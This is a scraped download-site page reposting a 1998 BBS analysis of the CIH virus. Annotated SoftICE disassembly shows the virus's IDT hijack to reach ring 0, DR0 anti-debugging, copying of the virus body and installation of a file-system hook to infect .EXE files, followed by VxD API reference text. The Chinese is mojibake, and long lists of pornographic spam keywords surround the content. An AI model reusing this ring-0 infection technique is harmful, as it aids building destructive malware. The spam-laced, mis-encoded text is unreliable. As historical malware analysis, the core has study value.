亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? softice分析cih的結(jié)果.txt

?? 該文件夾里面重點描述了CIH病毒的源碼和原理
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
發(fā)信人: TBsoft (TBsoft), 信區(qū): Virus 

標  題: SoftIce分析的結(jié)果[轉(zhuǎn)載] 

發(fā)信站: 武漢白云黃鶴站 (Mon Oct 26 10:51:47 1998) , 站內(nèi)信件 

  

發(fā)信人: Nova_Zhao@bbs.ustc.edu.cn (真生命), 信區(qū): virus 

標 題: SoftIce分析的結(jié)果 

發(fā)信站: 中國科大BBS站 (Sun Oct 25 10:37:13 1998) 

轉(zhuǎn)信站: wuheebbs!ustcnews!ustcbbs 

  

CIH 的分析 

被感染的EXE :Sthcd.exe 

文件長度 :209KB 

  

  

入口: 

CS:EIP=0137:004002A1 SS:ESP=013F:0069FE38 

EAX=004002A0 EBX=00000000 ECX=8159970C EDX=8159974C 

ESI=815996EC EDI=81599A08 EBP=0069FF78 EFL=00000A86 

DS=013F ES=013F FS=37E7 GS=0000 

  

  

  

0137:004002A0 PUSH EBP 

0137:004002A1 LEA EAX,[ESP-08] SS:0069FE30=BFF742F3 

0137:004002A5 XOR EBX,EBX 

0137:004002A7 XCHG EAX,FS:[EBX] ;FS是誰的段?? 

0137:004002AA CALL 004002AF 

0137:004002AF POP EBX ;EBX等于上一句的返回地址 

0137:004002B0 LEA ECX,[EBX+42] 

0137:004002B3 PUSH ECX 

0137:004002B4 PUSH EAX 

0137:004002B5 PUSH EAX   ;這4字節(jié)作為緩沖區(qū) 

0137:004002B6 SIDT FWORD PTR [ESP-02] ;取中斷描述符表寄存器(48字節(jié))       

  

0137:004002BB POP EBX           ;得到中斷描述符表基址   

0137:004002BC ADD EBX,1C       ;每個描述項占8字節(jié)     

0137:004002BF CLI               ;加1C則指向Int 3的描述項 

0137:004002C0 MOV EBP,[EBX]          

0137:004002C2 MOV BP,[EBX-04] ;保存Int 3的處理入口于EBP中 

0137:004002C6 LEA ESI,[ECX+12]       ;取新的Int 3的處理入口于ESI中  

0137:004002C9 PUSH ESI 

0137:004002CA MOV [EBX-04],SI 

0137:004002CE SHR ESI,10 

0137:004002D1 MOV [EBX+02],SI 

0137:004002D5 POP ESI ;設置新的Int 3的處理入口,本例中ESI=0x00400303 

0137:004002D6 INT 3 

0137:004002D7 PUSH ESI ;保存ESI 

0137:004002D8 MOV ESI,EAX 

0137:004002DA MOV ECX,[EAX-04] 

0137:004002DD REPZ MOVSB ;傳送一塊病毒體到申請的線性內(nèi)存 

0137:004002DF SUB EAX,08 

0137:004002E2 MOV ESI,[EAX] ;傳送完了么? 

0137:004002E4 OR ESI,ESI 

0137:004002E6 JZ 004002EA ;完則跳轉(zhuǎn) 

0137:004002E8 JMP 004002DA ;否則循環(huán) 

;本例中病毒體分為四塊,大小分為0x160,0xc8 

0xc9,0xfa,合計1003字節(jié) 

  

0137:004002EA POP ESI ;恢復ESI 

0137:004002EB INT 3 ;安裝文件監(jiān)視的服務,Important!!!! 

;置回Int 3的處理入口 

  

0137:004002EC STI 

0137:004002ED XOR EBX,EBX 

0137:004002EF JMP 004002F8 

0137:004002F1 XOR EBX,EBX 

0137:004002F3 MOV EAX,FS:[EBX] 

0137:004002F6 MOV ESP,[EAX] 

0137:004002F8 POP DWORD PTR FS:[EBX] 

0137:004002FB POP EAX 

0137:004002FC POP EBP 

0137:004002FD PUSH 0040A010 ;恢復原程序的運行 

0137:00400302 RET 

  

  

;新的Int 3的處理入口 

0137:00400303 JZ 00400337 

0137:00400305 MOV ECX,DR0 ;DR0調(diào)試斷點一,檢測調(diào)試程序 

0137:00400308 JECXZ 0040031A ;無則跳轉(zhuǎn) 

0137:0040030A ADD DWORD PTR [ESP],15 

0137:0040030E MOV [EBX-04],BP ;置回Int 3的處理入口 

0137:00400312 SHR EBP,10 

0137:00400315 MOV [EBX+02],BP      

0137:00400319 IRETD 

  

0137:0040031A MOV DR0,EBX ;破壞追蹤 

0137:0040031D PUSH 0F 

0137:0040031F PUSH ECX ;ECX必須為零,F(xiàn)or PG_VM 

0137:00400320 PUSH FF ;VM Handle 

0137:00400322 PUSH ECX ;Physical address is a multiple of 4K. 

0137:00400323 PUSH ECX ; 

0137:00400324 PUSH ECX 

0137:00400325 PUSH 01 

0137:00400327 PUSH 02 ;PAGEUSEALIGN 

0137:00400329 INT 20 VXDCall _PageAllocate ;申請一塊線性內(nèi)存 

0137:0040032F ADD ESP,20 

0137:00400332 XCHG EAX,EDI ;基址置于EDI中 

0137:00400333 LEA EAX,[ESI-63] ;取第一塊病毒體的地址 

0137:00400336 IRETD 

  

  

  

0137:00400337 LEA EAX,[EDI-0309] 

0137:0040033D PUSH EAX 

0137:0040033E INT 20 VXDCall IFSMgr_InstallFileSystemApiHook 

;安裝文件監(jiān)視的服務,Important!!!! 

0137:00400344 MOV DR0,EAX 

0137:00400347 POP EAX 

0137:00400348 MOV ECX,[ESI+3D] 

0137:0040034B MOV EDX,[ECX] 

0137:0040034D MOV [EAX-04],EDX 

0137:00400350 LEA EAX,[EAX-2A] 

0137:00400353 MOV [ECX],EAX 

0137:00400355 CLI 

0137:00400356 JMP 0040030E 

0137:00400358 PUSH EBX 

0137:00400359 CALL 0040035E 

0137:0040035E POP EBX 

0137:0040035F ADD EBX,24 

0137:00400362 PUSH EBX 

0137:00400363 INT 20 VXDCall IFSMgr_RemoveFileSystemApiHook 

0137:00400369 POP EAX 

0137:0040036A PUSH DWORD PTR [ESP+08] 

0137:0040036E CALL [EBX-04] 

0137:00400371 POP ECX 

0137:00400372 PUSH EAX 

0137:00400373 PUSH EBX 

0137:00400374 CALL [EBX-04] 

0137:00400377 POP ECX 

0137:00400378 MOV DR0,EAX 

0137:0040037B POP EAX 

0137:0040037C POP EBX 

0137:0040037D RET 

0137:0040037E CMP AL,0E 

0137:00400381 SHL BYTE PTR [EAX-18],00 

0137:00400385 ADD [EAX],AL 

0137:00400387 ADD [ESI-7F],BL 

0137:0040038A MOV BYTE PTR [EBX],03 

0137:0040038D ADD [EAX],AL 

0137:0040038F TEST BYTE PTR [ESI],01 

0137:00400392 JNZ 00400588 

0137:00400398 LEA EBX,[ESP+28] 

0137:0040039C CMP DWORD PTR [EBX],24 

0137:0040039F JNZ 00400582 

0137:004003A5 INC BYTE PTR [ESI] 

0137:004003A7 ADD ESI,05 

0137:004003AA PUSH ESI 

0137:004003AB MOV AL,[EBX+04] 

0137:004003AE CMP AL,FF 

0137:004003B0 JZ 004003BA 

0137:004003B2 ADD AL,40 

0137:004003B4 MOV AH,3A 

0137:004003B6 MOV [ESI],EAX 

0137:004003B8 INC ESI 

0137:004003B9 INC ESI 

0137:004003BA PUSH 00 

0137:004003BC PUSH 7F 

0137:004003BE MOV EBX,[EBX+10] 

0137:004003C1 MOV EAX,[EBX+0C] 

0137:004003C4 ADD EAX,04 

0137:004003C7 PUSH EAX 

0137:004003C8 PUSH ESI 

0137:004003C9 INT 20 VXDCall UniToBCSPath 

0137:004003CF ADD ESP,10 

0137:004003D2 CMP DWORD PTR [EAX+ESI-04],4558452E 

0137:004003DA POP ESI 

0137:004003DB JNZ 0040057F 

0137:004003E1 CMP WORD PTR [EBX+18],01 

0137:004003E6 JNZ 0040057F 

0137:004003EC MOV AX,4300 

0137:004003F0 INT 20 VXDCall IFSMgr_Ring0_FileIO 

0137:004003F6 JB 0040057F 

0137:004003FC PUSH ECX 

0137:004003FD MOV EDI,[ESI+00000062] 

0137:00400403 ADD [EAX],AL 

0137:00400405 ADD [EAX],AL 

0137:00400407 ADD [EAX],AL 

0137:00400409 ADD [EAX],AL 

0137:0040040B ADD [EAX],AL 

0137:0040040D ADD [EAX],AL 

0137:0040040F ADD [EAX],AL 

0137:00400411 ADD [EAX],AL 

0137:00400413 ADD [EAX],AL 

0137:00400415 ADD [EAX],AL 

0137:00400417 ADD [EAX],AL 

0137:00400419 ADD [EAX],AL 

0137:0040041B ADD [EAX],AL 

0137:0040041D ADD [EAX],AL 

0137:0040041F ADD [EAX],AL 

0137:00400421 ADD [EAX],AL 

0137:00400423 ADD [EAX],AL 

0137:00400425 ADD [EAX],AL 

0137:00400427 ADD [EAX],AL 

0137:00400429 ADD [EAX],AL 

0137:0040042B ADD [EAX],AL 

0137:0040042D ADD [EAX],AL 

0137:0040042F ADD [EAX],AL 

0137:00400431 ADD [EAX],AL 

0137:00400433 ADD [EAX],AL 

0137:00400435 ADD [EAX],AL 

0137:00400437 ADD [EAX],AL 

0137:00400439 ADD [EAX],AL 

0137:0040043B ADD [EAX],AL 

0137:0040043D ADD [EAX],AL 

  

//以上是病毒體的第一部分 

  

  

  

注釋: 

VXD服務 

1. _PageAllocate 

C語言原型:ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, 

   ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr, 

  ULONG flags); 

  

0137:0040031D PUSH 0F 

0137:0040031F PUSH ECX 

0137:00400320 PUSH FF 

0137:00400322 PUSH ECX 

0137:00400323 PUSH ECX 

0137:00400324 PUSH ECX 

0137:00400325 PUSH 01 

0137:00400327 PUSH 02 

  

  

#define PG_VM 0 

#define PG_SYS 1 

#define PG_RESERVED1 2 

#define PG_PRIVATE 3 

#define PG_RESERVED2 4 

#define PG_RELOCK 5 /* PRIVATE to MMGR */ 

#define PG_INSTANCE 6 

#define PG_HOOKED 7 

#define PG_IGNORE 0xFFFFFFFF 

  

#define PAGEZEROINIT 0x00000001 

#define PAGEUSEALIGN 0x00000002 

#define PAGECONTIG 0x00000004 

#define PAGEFIXED 0x00000008 

#define PAGEDEBUGNULFAULT 0x00000010 

#define PAGEZEROREINIT 0x00000020 

#define PAGENOCOPY 0x00000040 

#define PAGELOCKED 0x00000080 

#define PAGELOCKEDIFDP 0x00000100 

#define PAGESETV86PAGEABLE 0x00000200 

#define PAGECLEARV86PAGEABLE 0x00000400 

#define PAGESETV86INTSLOCKED 0x00000800 

#define PAGECLEARV86INTSLOCKED 0x00001000 

#define PAGEMARKPAGEOUT 0x00002000 

#define PAGEPDPSETBASE 0x00004000 

#define PAGEPDPCLEARBASE 0x00008000 

#define PAGEDISCARD 0x00010000 

#define PAGEPDPQUERYDIRTY 0x00020000 

#define PAGEMAPFREEPHYSREG 0x00040000 

#define PAGENOMOVE 0x10000000 

#define PAGEMAPGLOBAL 0x40000000 

#define PAGEMARKDIRTY 0x80000000 

  

  

2.IFSMgr_InstallFileSystemApiHook 

IFSMgr_InstallFileSystemApiHook( 

pIFSFileHookFunc HookFunc 

) 

3.IFSMgr_RemoveFileSystemApiHook 

IFSMgr_RemoveFileSystemApiHook( 

pIFSFileHookFunc HookFunc 

) 

4.UniToBCSPath 

UniToBCSPath( 

unsigned char * pBCSPath, 

ParsedPath * pUniPath, 

unsigned int maxLength, 

int charSet 

) 

This service converts a canonicalized unicode pathname to a normal pathname in t 

he 

specified BCS character set i.e. the path element lengths are converted into pro 

per 

path separators in addition to the character set conversion. Currently, the Wind 

ows 

ANSI codepage or the current OEM codepage in the system can be specified for the 

  

conversion. It is important to note that the source and destination buffers cann 

ot 

be the same nor can they overlap. They should be two separate buffers. This serv 

ice 

does not terminate the converted path with a NUL character, the caller of the se 

rvice 

needs to do this, if necessary. 

  

5.IFSMgr_Ring0_FileIO 

This service provides a register-based VxD callable interface to the common file 

system 

functions. Other VxDs in the system can use this service to make filesystem call 

s without 

having to issue int 21h calls. An FSD itself can call this interface to do files 

ystem 

operations in certain situations. The different functions provided as part of th 

is 

service are described below. Since these calls can be made only by 'trusted' sys 

tem 

components, the IFS manager does not do any parameter validation on them. Users 

of this 

service should be very careful to check that they are passing in valid parameter 

s. 

  

OpenCreateFile 

This interface is the same as the interface for the int 21h extended open functi 

on 

(06Ch ). If the R0_OPENCREATFILE function code is used, the operation is done in 

 an 

independent context, so that handle is globally accessible from any VM. If the 

R0_OPENCREAT_IN_CONTEXT function code is used, the operation is done in the cont 

ext 

of the current thread and process. 

[EAX] 

R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT 

  

[BX] 

  

Open mode and other flags. The flags are exactly the same as those on the int 21 

h 

function 6Ch. Please refer to the specification of the int 21h function for deta 

ils. 

  

[CX] 

  

Attributes to use on a create operation. 

  

[DL] 

  

Action to be performed. Look at the int 21h, function 6ch documentation for deta 

ils. 

  

[DH] 

  

Special flags that are available only on this api. This register is reserved and 

 not used on the int 21h, function 6Ch api. 

  

Special Ring 0 Api Open Flags: 

Value Meaning 

R0_NO_CACHE Indicates that reads and writes on the file should not be cached. 

All operations will be directly done to the disk. 

R0_SWAPPER_CALL Indicates that the i/o operation is being performed to the syste 

m 

swap file. This is a privileged call that should be set only by the 

memory manager when it is doing i/o to page stuff in and out of the disk. 

The filesystem that handles swap file io needs to ensure certain 

conditions to prevent deadlocks. These are described in section 8.3.4 

of this document. 

  

[ESI] 

  

Flat pointer to the pathname of the file to be opened/created. 

  

?Carry flag clear, operation was successful. 

  

[EAX] Handle to opened file. 

[ECX] Actual action performed. For the return values, please refer to the docume 

nt describing the int 21h, function 6Ch api. 

  

Carry flag set, an error occurred. [AX] contains the errorcode. 

Registers Used EAX, ECX, Flags. 

  

ReadFile 

This function is called to read a file previously opened by OpenCreateFile. The 

handle must be one returned from the OpenCreateFile service described above, it 

cannot be a handle opened by issuing an int 21h. If the R0_READFILE_IN_CONTEXT f 

unction code i 

  

  

[EAX] 

  

R0_READFILE or R0_READFILE_IN_CONTEXT. 

  

[EBX] 

  

File handle. 

  

[ECX] 

  

Count of bytes to be read. This can be a full 32-bit transfer count. 

  

[EDX] 

  

Position in file the read operation needs to start at. 

  

[ESI] 

  

Flat pointer to the buffer the data is to read into. 

  

?Carry flag clear, no error. 

  

[ECX] Number of bytes actually read. 

  

Carry flag set, an error occurred. [AX] contains the errorcode. 

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
青青国产91久久久久久| 国产精品久久久久久久岛一牛影视| 亚洲女人小视频在线观看| 99精品久久免费看蜜臀剧情介绍| 中文字幕一区二区不卡| 97se亚洲国产综合在线| 亚洲一区二区中文在线| 欧美色网一区二区| 蜜桃av一区二区| 欧美激情综合在线| 日本精品一级二级| 免费观看久久久4p| 亚洲国产精品ⅴa在线观看| av成人免费在线| 亚洲高清免费观看高清完整版在线观看 | 亚洲精品自拍动漫在线| 欧美亚洲丝袜传媒另类| 久久精品国产77777蜜臀| 亚洲国产精品黑人久久久| 色综合激情久久| 免费精品视频在线| 日韩一区有码在线| 欧美一级一级性生活免费录像| 国产成人a级片| 亚洲成人动漫av| 国产色综合一区| 欧美日韩一区小说| 高清日韩电视剧大全免费| 亚洲午夜精品17c| 精品成人a区在线观看| 色综合久久综合网97色综合| 奇米888四色在线精品| 中文字幕中文在线不卡住| 7878成人国产在线观看| www.日韩在线| 国内精品视频666| 亚洲成人精品一区| 中文成人综合网| 日韩欧美国产系列| 在线看日韩精品电影| 国产成人av一区二区| 日韩国产成人精品| 一区二区三区高清在线| 久久精品欧美一区二区三区不卡 | 久久久美女毛片| 欧美一区二区三区四区久久| 99精品视频中文字幕| 国产精品正在播放| 日韩综合小视频| 夜夜夜精品看看| 亚洲日本电影在线| 国产日韩影视精品| 精品区一区二区| 欧美日韩亚洲不卡| 色婷婷综合中文久久一本| 成人丝袜18视频在线观看| 久久精品99久久久| 天天影视涩香欲综合网| 亚洲一区二区三区美女| 亚洲天堂中文字幕| 国产精品欧美久久久久一区二区| 26uuu国产一区二区三区| 欧美一卡二卡三卡四卡| 欧美裸体bbwbbwbbw| 97成人超碰视| 色综合久久久久久久久| 99精品欧美一区二区三区小说| 成人蜜臀av电影| 99视频一区二区三区| 成人久久视频在线观看| 丰满少妇在线播放bd日韩电影| 九九国产精品视频| 国内成人免费视频| 国产乱人伦偷精品视频免下载| 精品一区二区精品| 国产一区二区三区综合| 国产精品一区免费视频| 国产美女视频一区| 成人午夜私人影院| 91在线视频播放地址| 色综合天天综合在线视频| 一本一道久久a久久精品| 色伊人久久综合中文字幕| 欧美艳星brazzers| 欧美日本在线播放| 日韩免费高清视频| 久久综合九色综合97_久久久| 久久亚洲精品小早川怜子| 国产农村妇女精品| 亚洲日本电影在线| 天天爽夜夜爽夜夜爽精品视频| 日韩av电影免费观看高清完整版 | 91精品国产欧美一区二区| 欧美卡1卡2卡| www激情久久| 亚洲三级免费电影| 亚洲成a天堂v人片| 黄色小说综合网站| 不卡高清视频专区| 欧美日韩综合在线免费观看| 日韩一级高清毛片| 国产欧美日韩不卡| 一区二区三区欧美| 奇米在线7777在线精品| 精品一区二区免费在线观看| 成人av网址在线| 色呦呦国产精品| 欧美精品一区二区在线观看| 亚洲欧洲国产日韩| 天天操天天色综合| 国产激情视频一区二区在线观看 | 亚洲一二三区在线观看| 久草在线在线精品观看| 91亚洲男人天堂| 欧美一级日韩免费不卡| 中文乱码免费一区二区| 日韩 欧美一区二区三区| 成人激情电影免费在线观看| 7777精品伊人久久久大香线蕉完整版| 久久欧美一区二区| 亚洲第一福利视频在线| 99re这里只有精品视频首页| 日韩小视频在线观看专区| 国产精品久久看| 九九国产精品视频| 欧美三级电影网站| 国产精品免费久久| 精品一区免费av| 欧美三级中文字幕| 中文字幕一区二区三区色视频| 日本va欧美va瓶| 91成人在线精品| 久久久精品欧美丰满| 五月天国产精品| 色综合中文字幕国产 | 久久毛片高清国产| 亚洲sss视频在线视频| 成人在线一区二区三区| 日韩精品一区二区三区中文不卡| 亚洲视频免费看| 国产福利一区二区三区在线视频| 欧美日韩高清在线播放| 亚洲欧洲精品一区二区三区不卡| 久久91精品久久久久久秒播| 在线不卡欧美精品一区二区三区| 亚洲欧洲色图综合| 国产成人午夜高潮毛片| 日韩精品一区二区三区四区视频| 亚洲图片欧美一区| 一本大道久久精品懂色aⅴ| 欧美激情一区二区三区四区| 蜜乳av一区二区三区| 欧美丰满少妇xxxxx高潮对白| 亚洲人快播电影网| 97久久超碰精品国产| 日韩美女视频一区| 暴力调教一区二区三区| 国产精品私人影院| 丁香天五香天堂综合| 精品99999| 国产麻豆午夜三级精品| 2023国产精品自拍| 激情综合网天天干| 亚洲精品一区二区在线观看| 美女高潮久久久| 精品欧美乱码久久久久久1区2区| 麻豆精品国产传媒mv男同| 日韩一区二区三区电影在线观看| 视频一区在线视频| 欧美高清激情brazzers| 天天影视涩香欲综合网 | 国产香蕉久久精品综合网| 国产呦萝稀缺另类资源| 久久久精品免费免费| 岛国一区二区在线观看| 中文字幕一区视频| 色婷婷久久久亚洲一区二区三区| 亚洲免费色视频| 欧美日韩久久不卡| 蜜臀久久99精品久久久画质超高清 | 欧美一卡在线观看| 国产一区二区三区免费在线观看| 久久精品视频网| 色一情一乱一乱一91av| 亚洲成人av电影| 欧美mv日韩mv国产网站app| 国产在线精品不卡| 国产精品福利电影一区二区三区四区| 成人一级视频在线观看| 亚洲免费伊人电影| 日韩欧美www| 成人av在线看| 亚洲h在线观看| 久久亚洲一级片| 91丨九色丨黑人外教| 日韩国产在线观看| 国产午夜亚洲精品午夜鲁丝片| www.亚洲国产| 日本午夜精品一区二区三区电影| 久久久不卡网国产精品二区|